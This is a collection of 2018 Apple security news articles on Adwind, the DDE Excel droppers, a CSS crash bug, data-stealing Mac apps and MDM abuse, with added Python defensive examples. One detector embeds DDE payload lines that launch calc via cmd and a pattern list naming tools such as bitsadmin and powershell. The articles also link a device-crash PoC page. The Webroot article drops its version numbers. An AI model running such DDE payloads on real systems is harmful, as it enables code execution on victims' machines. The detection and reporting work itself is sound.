Below is the video PoC published by Wardle. It shows the expert attempting to copy the contents of the address book and denying the operation when the operating system asks for permission. Wardle then uses an unprivileged app that lets him access the address book data anyway.

Wardle plans to present the technical details of the zero-day flaw at the upcoming Mac Security conference in Maui, Hawaii, in November.

New Adwind Campaign Targets Linux, Windows, and macOS

25.9.2018 securityweek  Apple

Adwind remote access Trojan (RAT) samples detected in a recent campaign were configured to gain persistence on Linux, Windows, and macOS systems, Cisco Talos warns.

The attacks featured the Adwind 3.0 RAT and employed a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel, ReversingLabs and Cisco Talos security researchers discovered.

The campaign started on August 26 and mainly targeted users in Turkey, with 75% of the observed requests made from that country. Some of the victims were located in Germany, likely members of the Turkish community there. The spam emails carrying malicious documents were written in Turkish.

The attackers used at least two different droppers for their malicious payload, in the form of CSV and XLT files. Both of them, however, would leverage a new variant of the DDE code injection attack, one that remained undetected until now.

In a report published Monday, Talos’ researchers explain that the dropper can actually have one of over 30 file extensions. While not all of them would be opened in Microsoft Excel by default, there are scripts that would start Excel with non-default files as well, making them viable in this attack scenario.

“Because the beginning of the file can contain anything, there is no header to be checked, which might confuse the antivirus; additionally, engines could expect ASCII characters for the CSV format. Other formats may be considered corrupted as they might not follow the expected format,” Talos reveals.

Excel also displays warnings to the user regarding the execution of code. One warning informs that the file, which is not a real XLT document, might be corrupted, asking the user if they are sure they want to open it. Two other warnings tell the user that the document will execute system applications.

If the user accepts all three warnings, the calculator application is executed on the system. The purpose of the campaign, however, is to inject code that would create and execute a Visual Basic Script that uses bitsadmin, a Microsoft tool to download or upload jobs and monitor their progress, to fetch the final payload.

The payload is a Java archive file containing code packed with the demo version of Allatori Obfuscator version 4.7.

The packed malware is a version of the Adwind RAT v3.0, configured to achieve persistence on all three major desktop platforms: Windows, Linux, and macOS. The persistence mechanism, however, is different for each platform.

Employed by several malicious groups for their nefarious purposes, the Trojan provides operators with the ability to execute all kinds of commands on the victim machines, log keystrokes, take screenshots, take pictures, and transfer files.

“The DDE variant used by the droppers in this campaign is a good example on how signature based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations. This kind of injection is known for years, however this actor found a way to modify it in order to have an extremely low detection ratio,” Talos concludes.

Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems

25.9.2018 securityaffairs Apple

Researchers from ReversingLabs and Cisco Talos have uncovered a new Adwind campaign that targets Linux, Windows, and macOS systems.
Security experts from ReversingLabs and Cisco Talos have spotted a new Adwind campaign that targets Linux, Windows, and macOS systems.

Adwind is a remote access Trojan (RAT). The samples used in the recently discovered campaign are Adwind 3.0 RAT and leverage the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel.

The campaign was uncovered at the end of August. Attackers mainly targeted users in Turkey (75%); experts noticed that other victims were located in Germany, but were likely members of the Turkish community there.

The spam campaign uncovered by the experts leveraged malicious documents written in Turkish.

“This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.” reads the analysis published by Cisco Talos.

The experts observed at least two different droppers in this campaign, using either .csv or .xlt files, both of which are opened by default by Microsoft Excel.

Both of them leverage a new variant of the DDE code injection attack; although the technique is well known, the variant used in this campaign is still undetected.

The dropper file can have more than 30 different file extensions. Some of them are not opened by Excel by default; however, the attackers can use a script that launches Excel with a file carrying one of these extensions as a parameter.

“Formats like CSV don’t have a predefined header, thus they can contain any kind of data at the beginning. Having random data like in the samples we found may trick the anti-virus into skipping the file scanning. Other formats may be considered corrupted, as they might not follow the expected format.” continues the report.


Excel will display different warnings to the user regarding the execution of code: the first is related to the execution of a corrupted file, the second notifies the user that the document will execute the application “CMD.exe.”

If the user accepts all the warnings, the application is executed on the system.

Talos pointed out that the attackers aim at injecting code that would create and execute a Visual Basic Script that uses the bitsadmin Microsoft tool (used to download or upload jobs and monitor their progress) to get the final payload in the form of a Java archive.

The Java code is packed with the demo version of the “Allatori Obfuscator” commercial packer, version 4.7.

The final payload is a sample of the Adwind RAT v3.0.

“The DDE variant used by the droppers in this campaign is a good example on how signature based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations.” Talos concludes.

“This kind of injection is known for years, however this actor found a way to modify it in order to have an extremely low detection ratio,”

Further details, including IoCs, are reported in the analysis published by Talos.
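Both Adwind write-ups above make the same defensive point: the dropper relies on the scanner trusting a file extension or a header that CSV does not have. The following added example (written for this page; it is not Talos', ReversingLabs' or the page's own code) is a small content-based scanner that ignores the extension entirely, decodes leniently so arbitrary leading bytes do not stop the scan, and flags cells that start with a formula character and invoke DDE or a system tool such as bitsadmin. The sample files are constructed for the demo, using the calculator PoC the articles mention, and are not campaign artifacts.

```python
"""Content-based detector for DDE launch formulas in text files Excel will open.
Added example for illustration; the sample inputs below are constructed."""
import re
from typing import Dict, List

# Characters that make Excel evaluate an imported text cell as a formula.
FORMULA_START = ("=", "+", "-", "@")

# Shapes a DDE launch can take inside a cell:
#   =DDE("cmd";"/c ...";"r1c1") / DDEAUTO(        and        =cmd|' /c ...'!A0
DDE_PATTERNS = [
    re.compile(r"\bDDE(?:AUTO)?\s*\(", re.I),
    re.compile(r"[=+\-@]\s*[a-z]+\s*\|\s*'[^']*'\s*!\s*[a-z]+\d*", re.I),
]

# System tools a formula has no business starting (bitsadmin is the one the
# articles name; the rest are common companions and are an assumption here).
LOLBIN_HINTS = re.compile(
    r"\b(bitsadmin|cmd(?:\.exe)?|powershell|mshta|regsvr32|wscript|cscript|certutil)\b",
    re.I,
)

CELL_SPLIT = re.compile(r"[,;\t]")


def _cells(line: str) -> List[str]:
    """Split a CSV-like line into trimmed cells; quoting is deliberately loose."""
    return [c.strip().strip('"').strip() for c in CELL_SPLIT.split(line)]


def scan_text(text: str) -> List[Dict[str, object]]:
    """Return one finding per line that carries a DDE formula or a formula
    invoking a system tool. A plain negative number such as -5 is not flagged,
    because the formula-start character alone is not enough."""
    findings: List[Dict[str, object]] = []
    lines = text.replace("\r\n", "\n").split("\n")  # no reliance on a header line
    for lineno, line in enumerate(lines, start=1):
        reasons: List[str] = []
        if any(p.search(line) for p in DDE_PATTERNS):
            reasons.append("dde-formula")
        for cell in _cells(line):
            if cell.startswith(FORMULA_START):
                hit = LOLBIN_HINTS.search(cell)
                if hit:
                    reasons.append("formula-invokes-" + hit.group(1).lower())
                    break
        if reasons:
            findings.append({"line": lineno, "reasons": reasons, "excerpt": line[:80]})
    return findings


def scan_bytes(data: bytes) -> List[Dict[str, object]]:
    """Scan raw file content. latin-1 maps every byte, so junk before the
    first row (the trick the droppers use) never aborts decoding."""
    return scan_text(data.decode("latin-1"))


def verdict(data: bytes) -> str:
    return "suspicious" if scan_bytes(data) else "clean"


# Constructed samples (not real campaign files).
SAMPLE_BENIGN = b"name,amount,note\nalice,10,paid\nbob,-5,refund\n"
SAMPLE_MALICIOUS = (
    b"\x8f\x13\xa0garbage-before-any-header\x00\xff\n"  # arbitrary leading bytes
    b"invoice,total\n"
    b"=cmd|' /c calc'!A0,1\n"                           # the calculator PoC
)
SAMPLE_DDE_FUNC = b'=DDE("cmd";"/c calc";"r1c1")\n'    # semicolon-separated variant

if __name__ == "__main__":
    for label, blob in [("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS),
                        ("dde-func", SAMPLE_DDE_FUNC)]:
        print(label, verdict(blob), scan_bytes(blob))
```

Run it over every attachment regardless of its extension; the point of the campaign is that extension-based scanning configurations are what let the droppers through.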

Experts disclose a Webroot SecureAnywhere macOS Kernel Level bug found months ago
17.9.2018 securityaffairs

Security experts disclosed a locally exploitable kernel-level vulnerability in the Webroot SecureAnywhere macOS security software.
The Webroot SecureAnywhere macOS security software was affected by a locally exploitable kernel-level vulnerability. An attacker who exploits the flaw could execute malware at the “kernel level” on a vulnerable Mac system.

The vulnerability, tracked as CVE-2018-16962, was patched months ago but publicly disclosed only yesterday.

“Webroot SecureAnywhere before on macOS mishandles access to the driver by a process that lacks root privileges.” reads the security advisory.

The flaw is difficult to trigger, it is exploitable only by a local attacker that is logged into a vulnerable Mac system or by tricking an already logged-in user into opening an exploit through social engineering.

The vulnerability was discovered by researchers at Trustwave. The flaw was caused by the lack of validation of an arbitrary user-supplied pointer that is read from and potentially written to.

“Trustwave recently discovered a locally exploitable issue in the macOS version of the Webroot SecureAnywhere solution.” reads the analysis published by Trustwave.

“The issue's root cause is an arbitrary user-supplied pointer being read from and potentially written to. As such, the issue arms an attacker with a write-what-where kernel gadget with the caveat that the original value of the memory referenced by the pointer must be equal to (int) -1.”

Under certain conditions, the issue could be chained with other exploits to gain a local privilege escalation.

The researchers pointed out that the exploitability of the flaw is limited in that the original value of the memory address dereferenced must be (int) -1.

A workable exploit would also need to bypass KASLR (kernel address space layout randomisation) on the versions of OS X/macOS supported by SecureAnywhere.

Webroot addressed the vulnerability since July with the release of SecureAnywhere for MacOS version At the time of writing, there is no evidence of any compromises from this vulnerability.

Trustwave decided to disclose the issue only now for the following reason:

“It is important that the details of our research are accurate and in order. Vendors at times issue a patch faster than we post full details on findings. We often provide users with more time to apply the patch before we release technical details about a vulnerability.”


Below the statement published by Webroot:

“The security of our customers is of paramount importance to Webroot. This vulnerability was remedied in software version which has been available for our customers since July 24, 2018. We have no evidence of any compromises from this vulnerability.

For any user running a version of Mac not currently supported by Apple (OS 10.8 or lower), we recommend upgrading to an Apple-supported version to receive our updated agent and be in line with cybersecurity best practices on system patching.

Collaboration in the cybersecurity community is what keeps us all safer. We appreciate the Trustwave SpiderLabs team’s use of responsible disclosure to help protect the wider community from cyberthreats.”

Researcher devised a new CSS & HTML attack that causes iPhone reboot or freezes Macs
17.9.2018 securityaffairs

The security researcher Sabri Haddouche from Wire devised a new CSS attack that causes iPhones to reboot or freezes Macs.
Sabri Haddouche, a security researcher at Wire, devised a new attack method that saturates an Apple device's resources and causes it to crash or restart when visiting a web page. The expert discovered that iOS restarts and macOS freezes when the user visits a web page containing certain CSS and HTML.

Depending on the version of iOS being used, the bug can trigger a UI restart or cause a kernel panic with a consequent device reboot.

How to force restart any iOS device with just CSS? 💣

Source: https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea …

IF YOU WANT TO TRY (DON’T BLAME ME IF YOU CLICK) : https://cdn.rawgit.com/pwnsdx/ce64de2760996a6c432f06d612e33aea/raw/23f2faa0aadb4babbfd228c8bb32a26a8c51c741/safari-ripper.html …

2:45 PM - Sep 15, 2018


This attack leverages a weakness in the -webkit-backdrop-filter CSS property; for this reason, it affects all browsers on iOS, since they all use WebKit as the rendering engine. The weakness also affects Safari and Mail on macOS, but it doesn't affect Linux and Windows systems.

“The attack exploits a weakness in the –webkit-backdrop-filter CSS property,” Haddouche explained to BleepingComputer. “By using nested divs with that property, we can quickly consume all graphic resources and crash or freeze the OS. The attack does not require Javascript to be enabled therefore it also works in Mail. On macOS, the UI freeze. On iOS, the device restart.”


Haddouche successfully tested the attack on iOS 12, where it caused the device to reboot; on iOS 11.4.1 it only caused a UI restart.

Haddouche explained that on macOS, the attack will only cause Mail and Safari to freeze for a second and then slow down the computer.

Haddouche also devised another attack that uses HTML, CSS, and JavaScript to completely freeze macOS systems. The researcher told Bleeping Computer that he has not disclosed it because it persists after reboot: macOS relaunches Safari with the malicious page, causing the system to enter a loop that freezes it again.

Lawrence Abrams from Bleeping Computer created a video showing what happens when a user visits the attack page created by Haddouche (hosted on rawgit[.]com) and published on GitHub. Lawrence used an iPhone running iOS 11.4.1.

The bad news is that there is no mitigation for this attack.

How Apple's Safari Browser Will Try to Thwart Data Tracking
15.9.2018 securityweek Apple

New privacy features in Apple's Safari browser seek to make it tougher for companies such as Facebook to track you.

Companies have long used cookies to remember your past visits. This can be helpful for saving sign-in details and preferences. But now they're also being used to profile you in order to fine-tune advertising to your tastes and interests.

Cookie use goes beyond visiting a particular website. As other sites embed Facebook "like" and "share" buttons, for instance, Facebook's servers are being pinged and can access your stored cookies. That means Facebook now knows you frequent celebrity gossip sites or read news with a certain political bent. Ads can be tailored to that.

Here's how Safari is getting tougher in dealing with that.


Safari used to wait 24 hours from your last visit to a service before blocking that service's cookies on third-party sites. That effectively exempted Facebook, Google and other services that people visited daily. Now, Safari will either block the cookie automatically or prompt you for permission.

Apple says Safari will still be able to remember sign-in details and other preferences, though some websites have had to adjust their coding.


Browsers typically reveal seemingly innocuous information about your device, such as the operating system used and fonts installed. Websites use this to make minor adjustments in formatting so that pages display properly.

Browsers have historically made a lot of information available, largely because it seemed harmless. Now it's clear that all this data, taken together, can be used to uniquely identify you. Safari will now hide many of those specifics so that you will look no different from the rest.

It's like a system that digitally blurs someone's image, said Lance Cottrell, creator of the privacy service Anonymizer. "You can tell it's a person and not a dog, but you can't recognize a person's face," he said.

For instance, Safari will reveal only the fonts that ship with the machine, not any custom fonts installed.


When visiting a website, the browser usually sends the web address for the page you were just on. This address can be quite detailed and reveal the specific product you were exploring at an e-commerce site, for instance.

Now, Safari will just pass on the main domain name for that site. So it would be just "Amazon.com" rather than the specific product page at Amazon.


Some ad companies have sought to bypass restrictions on third-party cookies — that is, identifiers left by advertisers — by using a trick that routed them through a series of websites. That could make a third-party cookie look like it belonged to a site you're visiting. Safari will now try to catch that.

The changes come Tuesday as part of the iOS 12 update for iPhones and iPads and a week later in the Mojave update for Mac computers.

Many of the safeguards will be limited to cookies that Apple deems to be trackers. That's being done to reduce the likelihood of inadvertently blocking legitimate third-party cookies.
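The two Safari behaviours that site operators most often have to reason about are the referrer trimming and the first-party versus third-party classification described above. The added example below (not Apple's code, and only a model of what the article describes) shows both decisions on constructed URLs: a cross-site request carries only the page's scheme and host, a same-site request keeps the full page address, and an HTTPS page sends nothing to a plain-HTTP request. The suffix handling is a deliberately tiny stand-in for the Public Suffix List real browsers consult, so `MULTI_LABEL_SUFFIXES` is an assumption of the demo.

```python
"""Model of cross-site referrer trimming and third-party classification.
Added illustration; the suffix list and all URLs are constructed for the demo."""
from typing import Optional
from urllib.parse import urlsplit

# Stand-in for the Public Suffix List (assumption: only these multi-label
# suffixes are recognised). Real browsers use the full list.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp"}


def registrable_domain(host: str) -> str:
    """Return the 'site' (eTLD+1) a host belongs to, e.g. www.bbc.co.uk -> bbc.co.uk."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_third_party(page_url: str, request_url: str) -> bool:
    """A request is third-party when its site differs from the page's site.
    This is the distinction that decides whether cookie restrictions apply."""
    page_host = urlsplit(page_url).hostname or ""
    req_host = urlsplit(request_url).hostname or ""
    return registrable_domain(page_host) != registrable_domain(req_host)


def trimmed_referrer(page_url: str, request_url: str) -> Optional[str]:
    """Referrer a privacy-conscious browser would attach to request_url when
    the user is on page_url:
      * None when an HTTPS page would otherwise leak to an HTTP request
      * scheme://host/ only for cross-site requests (the product page stays private)
      * the full page URL for same-site requests
    Sites can ask for the same behaviour themselves with the
    'Referrer-Policy: strict-origin-when-cross-origin' response header."""
    page = urlsplit(page_url)
    if page.scheme == "https" and urlsplit(request_url).scheme != "https":
        return None
    if is_third_party(page_url, request_url):
        return f"{page.scheme}://{page.netloc}/"
    return page.geturl()


if __name__ == "__main__":
    page = "https://shop.amazon.test/dp/B0/widget?ref=x"   # constructed product page
    for target in ("https://like.social.test/btn",         # embedded share button
                   "https://images.amazon.test/a.png",     # same-site asset
                   "http://plain.test/"):                  # downgrade to HTTP
        print(target, "third-party" if is_third_party(page, target) else "same-site",
              trimmed_referrer(page, target))
```

The example generalises slightly beyond the article: the HTTPS-to-HTTP case is the standard referrer downgrade rule rather than something the article spells out, and the same-site branch is included so the contrast with the trimmed cross-site referrer is visible.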

Mac Apps From Apple's App Store Steal User Data, Researchers Say
10.9.2018 securityweek Apple

Mac applications distributed via Apple’s official App Store marketplace are collecting and exfiltrating sensitive user data, security researchers have discovered.

The multiple programs exhibiting such behavior send the collected data to the developer’s infrastructure, but some of the data ends up on Chinese servers, “which may not be subject to the same stringent requirements around storage and protection of personally identifiable information like organizations based in the US or EU,” Malwarebytes says.

One of the offending applications is Adware Doctor, which Objective-See’s Patrick Wardle found exfiltrating browser history (targeting Safari, Chrome, and Firefox), a list of all running processes, and a list of software that the user has downloaded (and from where).

To gain access to the list of running processes, the developer found a way to bypass Apple’s sandbox protections. By posing as a security-related app, the software can request file-access permissions that otherwise would not be granted to it.

Despite its malicious purpose, Adware Doctor managed to become highly popular, being the fourth top paid software in the official Mac App Store, and first in the paid utilities section. Apple has removed the software from the store, but it might not be long before it returns.

This has happened in the past. The app first emerged in the Mac App Store a couple of years ago, named Adware Medic, a rip-off of Thomas Reed’s highly successful app of the same name, which became Malwarebytes for Mac. Apple pulled it after being informed of the matter, but within weeks the app returned as Adware Doctor.

“We’ve continued to fight against this app, as well as others made by the same developer, and it has been taken down several times now, but in a continued failure of Apple’s review process, is always replaced by a new version before long,” Malwarebytes’ Thomas Reed explains.

Open Any Files: RAR Support is yet another app that shows a similar behavior, collecting user data in a .zip archive and uploading the file to a developer’s server. Exfiltrated data included complete browsing and search history for Safari, Chrome, and Firefox, and complete App Store browsing history. Recently, the software stopped siphoning said data.

The app was also designed to promote Dr. Antivirus, usually when the user opens an unfamiliar file (often claiming that an infection is preventing the user from opening the file). Reed says Open Any Files dropped on their radar last year and was reported to Apple in December 2017.

Dr. Antivirus, in addition to lacking good detection rates, was also observed exhibiting “the same pattern of data exfiltration as seen in Open Any Files! We saw the same data being collected and also uploaded in a file named file.zip to the same URL used by Open Any Files,” Reed notes.

In addition to browsing history, the file was found to contain detailed information about every application found on the system.

As it turns out, other applications from the same developer have data exfiltration capabilities, including Dr. Cleaner (which doesn’t collect the list of installed applications). The website that promotes these apps appears to be owned by an individual living in China.

The main issue, Reed says, is that Apple allows for such apps to be listed in the official store and that it is sometimes slow to take action on the offending applications, despite researchers’ reports. Thus, users should pay attention when downloading software from the Mac App Store, as some applications could be dangerous.

“It’s blindingly obvious at this point that the Mac App Store is not the safe haven of reputable software that Apple wants it to be. I’ve been saying this for several years now, as we’ve been detecting junk software in the App Store for almost as long as I’ve been at Malwarebytes. This is not new information, but these issues reveal a depth to the problem that most people are unaware of,” Reed points out.

A growing number of iOS apps collect and sell location data
10.9.2018 securityaffairs Apple

A growing number of iOS apps currently collect location data, WiFi network IDs and other data, from iPhone users and sell them to monetization firms.
A group of security researchers that developed the popular Guardian mobile firewall app revealed that a growing number of iOS apps currently collect location data, WiFi network IDs and other data, from iPhone users and sell them to advertising companies.

Let me immediately highlight that these iOS apps collect data after asking users for permission to do so, but fail to inform users that the gathered information is shared with third-party advertising and marketing companies.

The experts have observed that all these apps have embedded tracking codes provided by advertising and marketing firms.

“The GuardianApp team has discovered that a growing number of iOS apps have been used to covertly collect precise location histories from tens of millions of mobile devices, using packaged code provided by data monetization firms. In many cases, the packaged tracking code may run at all times, constantly sending user GPS coordinates and other information.” states the Guardian app research team.

“In order to gain initial access to precise data from the mobile device’s GPS sensors, the apps usually present a plausible justification relevant to the app in the Location Services permission dialog, often with little or no mention of the fact that location data will be shared with third-party entities for purposes unrelated to app operation.”
Most of the apps asked for permission to access GPS coordinates, Bluetooth LE beacon data, and Wi-Fi SSID (Network Name) and BSSID (Network MAC Address).

Some apps also collect other types of device information, including accelerometer information (X-axis, Y-axis, Z-axis), advertising identifier (IDFA), battery charge percentage and status (battery or USB charger), cellular network MCC/MNC, cellular network name, GPS altitude and/or speed, and timestamps for departure from/arrival at a location.

The report published by the Guardian app team includes the names of 12 monetization firms that received data along with the names of 24 apps that use the tracking code provided by location data monetization firms.

The report also includes the names of 100 news apps containing monetization code provided by data monetization firm RevealMobile.

“In August 2017, RevealMobile was also found to be packaged in the AccuWeather app for a brief period of time and was criticized by users for collecting Wi-Fi SSID and BSSID from user’s even if Location Services access was denied (More:https://www.zdnet.com/article/accuweather-caught-sending-geo-location-data-even-when-denied-access/ ).” continues the report.

Experts also shared these potential mitigations:

Go to Settings > Privacy > Advertising and turn on Limit Ad Tracking in order to make unique identification of your iOS device more difficult for location trackers.
Press “Don’t Allow” if a Location Services permission dialog contains “See privacy policy” or similar text.
Use a very generic name for the SSID of your home Wi-Fi router (e.g. “home-wifi-1”).
Turn off Bluetooth functionality when it is not in use.

Apple removed the popular app Adware Doctor because steals user browsing history
8.9.2018 securityaffairs Apple

Apple has removed one of the most popular anti-malware apps, called Adware Doctor:Anti Malware &Ad, from the official macOS App Store.
Apple has removed one of the most popular anti-malware apps, called Adware Doctor:Anti Malware &Ad, from the official macOS App Store because it was gathering users’ browser histories and other sensitive data and uploading them to a remote server in China.

Adware Doctor was the top paid utility in the official Mac App Store, with a good reputation built on thousands of reviews and a 4.8-star rating.

Ironically, an application developed to protect Mac systems was exposing users’ personal data without their permission.

The unwanted behavior was spotted by a security researcher who goes by the Twitter handle Privacy 1st. He discovered that Adware Doctor gathered browsing history from Safari, Chrome and Firefox, the search history of the App Store, and a list of running processes.


Privacy 1st
Top Sold MacOS AppStore application is ROGUE. Adware Doctor is stealing your privacy. PoC: https://www.youtube.com/watch?v=nZ7CVIy5Tq8&feature=youtu.be …#malware #virus #MacOS #Apple #MacBook #MacBookPro #CyberSecurity #privacy #GDPR #Hacking #hackers #cyberpunk #Alert

8:30 AM - Aug 20, 2018
The expert also discovered that the gathered information was first stored in a password-protected zip file named “history.zip” and then uploaded to a remote server.

Privacy 1st shared his discovery with former NSA hacker Patrick Wardle, who confirmed the findings after conducting his own review.

Below is a video created by Privacy_1st to show his findings.

By redirecting DNS resolution, Patrick Wardle was able to capture the exfiltrated data.


The history.zip file is exfiltrated to a remote server, dscan.yelabapp.com, hosted on Amazon AWS; analysis of its DNS entries shows that it is administered by an entity in China.

The app was developed by an individual identified as “Yongming Zhang.” Wardle speculated that this may be a reference to “Zhang Yongming,” a Chinese serial killer.

Thomas Reed, director of Mac and mobile security at Malwarebytes, said his firm has been monitoring the activity of this developer since 2015.

“At that time, we discovered an app on the App Store named Adware Medic – a direct rip-off of my own highly-successful app of the same name, which became Malwarebytes for Mac,” Reed wrote.

“We immediately began detecting this, and contacted Apple about removing the app. It was eventually removed, but was replaced soon after by an identical app named Adware Doctor.”

Reed confirmed that a similar data exfiltration methodology was observed in other products as well (i.e. “Open Any Files: RAR Support”, “Dr. Antivirus”, and “Dr. Cleaner”).

Unfortunately, Apple has allowed this kind of dubious behavior, as well as near-identical app names that can confuse users.

“If Apple is really “review[ing] each app before it’s accepted by the store” … how were these grave (and obvious) violations of this application missed!?,” Wardle states in his blog post. “Who knows, and maybe this one just slipped through. Maybe we should give them the benefit of the doubt, as yes we all make mistakes! But this brings us to the next point. Apple also claims that “if there’s ever a problem with an app, Apple can quickly remove it from the store”. Maybe the key word here is “can”.”

Attackers Abuse Age Restrictions to Hide Apps on iOS Devices
6.9.2018 securityweek Apple

Malicious actors leveraging an open source mobile device management (MDM) system have been abusing a legitimate iOS feature to hide legitimate applications and trick victims into using malicious counterparts.

The attacks, first exposed by Talos’ security researchers in July, involved the use of malicious versions of five programs (AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp) that were then deployed onto iOS devices to steal messages.

Given how the enrollment process for the MDM works, the security researchers assumed right from the start that the rogue applications were being installed either via direct access to the compromised devices or through sophisticated social engineering. Each step of the enrollment process required user interaction, Talos discovered.

The security researchers now reveal that the attackers abused the MDM solution to control the victims’ devices and deploy a new profile onto them. Next, the actors leveraged the age rating restriction functionality in iOS to hide the legitimate apps.

The age ratings for WhatsApp and Telegram are 12-plus and 17-plus, respectively, and the actors set the age rating limit to 9-plus. Thus, the legitimate apps would no longer be shown on the device and the victim was only able to access the rogue variants instead.

“The app still exists on the device, however, the user will not be able to interact with it, even if the user searches for the app using the search function on the iOS device. It simply does not open. All mobile device users should be aware of these attack methods as to prevent attackers from gaining control of their phones through an MDM,” Talos explains.

iOS supports configuring devices through profiles, and MDM enrollment itself is performed with a profile. Such profiles are easy to create, and Apple even offers an official tool for it. Profiles can restrict app usage, but such restrictions are usually limited to supervised devices.

The iPhones impacted by these attacks, however, were not in supervised mode. Instead, the attackers abused the age rating to forbid the use of apps rated above 9-plus. Thus, the apps remained on the device but could no longer be accessed.

“Once this profile is installed on the iOS device, the applications restricted by the age rating stay installed, but can no longer be used or accessed, and the icon disappears from the device springboard,” Talos explains.

The profile can be installed manually via Apple Configurator, or by opening the profile XML from Safari. Once that happens, a new entry appears in the Settings > General > Profile menu. However, if the MDM deploys the profile, it does not appear there (the MDM enrollment profile will be present).

“It's important to note here that there is no malicious malware, vulnerability or zero-day used to enroll the phone within the MDM. It is a legitimate method of device administration that is used within enterprises throughout the world. The attacker has merely leveraged this process,” the researchers note.

Users can head to Settings > General > Profiles & Device Management > [MDM configuration] on their iOS devices to view information about the restrictions and applications set/installed by MDM profiles. If no Profiles & Device Management menu is available, the device is not enrolled.
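As an added example (not Talos' code), here is a small Python audit of a configuration profile that flags the Restrictions trick described above. It assumes Apple's documented com.apple.applicationaccess payload with its integer ratingApps key; the sample profile and app inventory are constructed.

```python
import plistlib

# Apple's Restrictions payload (PayloadType com.apple.applicationaccess) stores the
# app age-rating ceiling in the integer key "ratingApps". Assumed value mapping from
# Apple's configuration profile reference: 1000 allows every app, 0 allows none.
RATING_LABELS = {0: "no apps", 100: "4+", 200: "9+", 300: "12+", 600: "17+", 1000: "all apps"}

# Constructed inventory of installed apps with numeric ratings on the same scale.
# WhatsApp (12+) and Telegram (17+) are the two ratings the article gives.
APP_RATINGS = {"WhatsApp": 300, "Telegram": 600, "PrayTime": 100}


def apps_hidden_by_cap(rating_cap, app_ratings=APP_RATINGS):
    """Return the installed apps whose rating exceeds the profile's ceiling.

    These are the apps iOS keeps installed but removes from the springboard
    and from search, which is the behaviour Talos describes.
    """
    return sorted(app for app, rating in app_ratings.items() if rating > rating_cap)


def audit_profile(profile_bytes):
    """Parse a .mobileconfig plist and report every Restrictions payload that
    lowers the app age-rating ceiling below 'all apps'."""
    profile = plistlib.loads(profile_bytes)
    findings = []
    for payload in profile.get("PayloadContent", []):
        if payload.get("PayloadType") != "com.apple.applicationaccess":
            continue
        cap = payload.get("ratingApps")
        if cap is None or cap >= 1000:
            continue  # ceiling absent or permissive: nothing gets hidden
        findings.append({
            "payload": payload.get("PayloadIdentifier", "<unnamed>"),
            "ratingApps": cap,
            "label": RATING_LABELS.get(cap, str(cap)),
            "hidden_apps": apps_hidden_by_cap(cap),
        })
    return findings


# Constructed sample profile mirroring the 9+ ceiling the attackers used.
SAMPLE_PROFILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>PayloadType</key><string>Configuration</string>
  <key>PayloadIdentifier</key><string>com.example.constructed.restrictions</string>
  <key>PayloadUUID</key><string>00000000-0000-4000-8000-000000000001</string>
  <key>PayloadVersion</key><integer>1</integer>
  <key>PayloadContent</key>
  <array>
    <dict>
      <key>PayloadType</key><string>com.apple.applicationaccess</string>
      <key>PayloadIdentifier</key><string>com.example.constructed.restrictions.apps</string>
      <key>PayloadUUID</key><string>00000000-0000-4000-8000-000000000002</string>
      <key>PayloadVersion</key><integer>1</integer>
      <key>ratingRegion</key><string>us</string>
      <key>ratingApps</key><integer>200</integer>
    </dict>
  </array>
</dict>
</plist>
"""

if __name__ == "__main__":
    for finding in audit_profile(SAMPLE_PROFILE):
        hidden = ", ".join(finding["hidden_apps"]) or "nothing"
        print(f"{finding['payload']}: ratingApps={finding['ratingApps']} "
              f"({finding['label']}), hides {hidden}")
```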

North Korean Hackers Hit Cryptocurrency Exchange with macOS Malware
24.8.2018 securityweek Apple

In a recent attack against a cryptocurrency exchange, the North Korea-linked Lazarus group went the extra mile by deploying malware for macOS, Kaspersky Lab has discovered.

Active since at least 2009 and supposedly backed by the North Korean government, Lazarus is considered the most serious threat to banks. The group is said to have orchestrated a large number of high-profile attacks, including the Sony hack in 2014 and last year’s WannaCry outbreak.

In recent months, in addition to banks, the group has focused on various cryptocurrency exchanges. In one of the attacks, which Kaspersky refers to as Operation AppleJeus, the group tricked an unsuspecting employee into downloading a trojanized cryptocurrency trading application that covertly downloaded and installed the Fallchill malware.

What made this attack stand out compared to other Lazarus-linked incidents, however, was the fact that the attackers designed their malware to target macOS too, in addition to Windows. This is the first time Lazarus is observed using malware for Apple’s operating system, Kaspersky says.

“The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms,” the security firm points out.

The malicious code, however, wasn’t delivered alongside the application’s installation package. Instead, it was pushed to the target machine in the form of an update, Kaspersky’s security researchers have discovered.

The legitimate-looking application is called Celas Trade Pro and comes from Celas Limited. An all-in-one style cryptocurrency trading program, it showed no signs of malicious behavior at first.

However, at the end of the installation process, it was seen running the Updater.exe module, which would collect system information and send it back to the server in the form of a GIF image.

Based on the server’s response, the updater either keeps quiet or base64-decodes a payload and decrypts it with RC4 using another hardcoded key to retrieve an executable file.

“For macOS users, Celas LLC also provided a native version of its trading app. A hidden ‘autoupdater’ module is installed in the background to start immediately after installation, and after each system reboot,” Kaspersky explains.

The module would continuously contact the command and control (C&C) server to fetch and run an additional executable file. The communication with the server is performed in a manner similar to that employed by the Windows version, with the system information being sent encrypted, disguised as an image file upload and download.

The Updater application is hidden from Finder and from a default Terminal directory listing, and is passed the command-line argument “CheckUpdate” at launch. The application apparently quits if no argument is supplied, likely a way to evade detection by sandboxes.

